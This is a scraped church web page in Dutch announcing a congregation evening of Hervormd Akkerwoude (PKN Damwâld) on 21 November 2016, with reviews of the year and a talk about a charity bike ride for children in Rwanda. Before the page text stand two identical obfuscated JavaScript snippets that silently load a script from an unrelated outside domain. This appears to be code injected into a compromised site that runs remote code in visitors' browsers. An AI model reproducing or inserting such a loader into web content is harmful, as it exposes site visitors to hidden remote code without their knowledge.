;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Welkom op de gemeenteavond ... Hervormd Akkerwoude c.a. - PKN Damwâld
21 november 2016
19:30 t/m 21:00
't Skûlplak
Welkom op de gemeenteavond … Hervormd Akkerwoude c.a.Verbinding met jouw gemeente …

De kerkenraad nodigt alle gemeenteleden uit voor een gemeenteavond op maandag 21 november 2016 in ’t Skûlplak aan de Bûterblom 8 in Damwâld. Aanvang is 19.30 uur.

Een aantal zaken zullen deze avond aan de orde komen. Zo zullen de voorzitters van de verschillende colleges terugblikken op het afgelopen jaar en vertellen wat de plannen zijn voor de komende periode. Na het officiële gedeelte volgt er een presentatie van Gerke Jilt Veenstra over zijn fietstocht voor de arme kinderen in Rwanda. Natuurlijk is er ook volop ruimte voor ‘ontmoeting’. Een uitstekende gelegenheid dus om met elkaar in gesprek te gaan over het reilen en zeilen in onze gemeente en om u vanuit de kerkenraad bij te praten. Iedereen is dan ook van harte uitgenodigd!

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld